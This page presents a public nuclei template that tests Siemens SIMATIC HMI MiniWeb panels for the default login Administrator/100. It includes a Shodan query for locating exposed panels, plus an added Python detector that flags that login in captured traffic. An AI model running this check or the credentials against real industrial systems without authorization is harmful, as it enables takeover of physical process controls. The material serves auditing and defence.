Identified Siemens SIMATIC HMI MiniWeb interfaces that were accessible using default credentials. These interfaces are used to remotely monitor and control Human-Machine Interface (HMI) panels deployed in industrial environments. Leaving the default login in place posed a significant risk to operational technology (OT) systems.
PoC code [public]
id: siemens-simatic-default-login

info:
  name: Siemens SIMATIC HMI Miniweb - Default Login
  author: biero-el-corridor
  severity: high
  description: |
    Identified Siemens SIMATIC HMI MiniWeb interfaces that were accessible using default credentials.These interfaces are used to remotely monitor and control Human-Machine Interface (HMI) panels deployed in industrial environments. Leaving the default login in place posed a significant risk to operational technology (OT) systems.
  metadata:
    max-request: 1
    verified: true
    shodan-query: title:"Miniweb Start Page"
  tags: ics,siemens,default-login,vuln

http:
  - raw:
      - |
        POST /FormLogin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        Login=Administrator&Redirection=/Templates/Loginpage.html&Password=100

    matchers-condition: and
    matchers:
      - type: word
        part: response
        words:
          - 'siemens_ad_session='
          - 'Auth Form Response'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022046720def522cc848031fc3300c41b4dc6a2ab8e9063ffcb451a7e932611f3ee6022100cd0b0bff11e21f70fc44ffc47a5fc05670d0a9b968f8fedfb39cd5eb9618d37e:922c64590222798bb761d5b6d8e72950
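
For monitoring, the same request and matcher logic can be applied to captured HTTP traffic (for example from a proxy in front of the HMI network) to alert when the default pair is submitted and accepted. The following is an added example, not part of the template or the template author's code; the function names, the `hmi.example` host and the sample captures are constructed assumptions.

```python
from urllib.parse import parse_qs

# Values taken from the template on this page.
LOGIN_PATH = "/FormLogin"
DEFAULT_LOGIN = ("Administrator", "100")
SUCCESS_WORDS = ("siemens_ad_session=", "Auth Form Response")

# Constructed capture for illustration; real device output may differ.
SAMPLE_REQUEST = (
    "POST /FormLogin HTTP/1.1\r\nHost: hmi.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "Login=Administrator&Redirection=/Templates/Loginpage.html&Password=100"
)
SAMPLE_ACCEPTED = (
    "HTTP/1.1 200 OK\r\nSet-Cookie: siemens_ad_session=CONSTRUCTED; path=/\r\n\r\n"
    "<html><title>Auth Form Response</title></html>"
)
SAMPLE_REJECTED = "HTTP/1.1 200 OK\r\n\r\n<html><title>Auth Form Response</title></html>"


def split_http(raw):
    """Split a raw HTTP message into (start line, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    return head.split("\n", 1)[0], body


def is_default_login_attempt(raw_request):
    """True if the request posts the template's credential pair to /FormLogin."""
    start, body = split_http(raw_request)
    parts = start.split()
    if len(parts) < 2 or parts[0] != "POST" or parts[1].split("?")[0] != LOGIN_PATH:
        return False
    form = parse_qs(body.strip(), keep_blank_values=True)
    return (form.get("Login", [""])[0], form.get("Password", [""])[0]) == DEFAULT_LOGIN


def login_accepted(raw_response):
    """Template matchers: status 200 AND both words present in the response."""
    parts = split_http(raw_response)[0].split()
    status_ok = len(parts) >= 2 and parts[1] == "200"
    # 'part: response' is read here as headers plus body, so search it all.
    return status_ok and all(word in raw_response for word in SUCCESS_WORDS)


def classify(raw_request, raw_response):
    """Label one captured request/response pair for alerting."""
    if not is_default_login_attempt(raw_request):
        return "not-default-login"
    return "default-login-accepted" if login_accepted(raw_response) else "default-login-rejected"
```

A `default-login-accepted` result means the panel still has the factory login in place and should have its password changed.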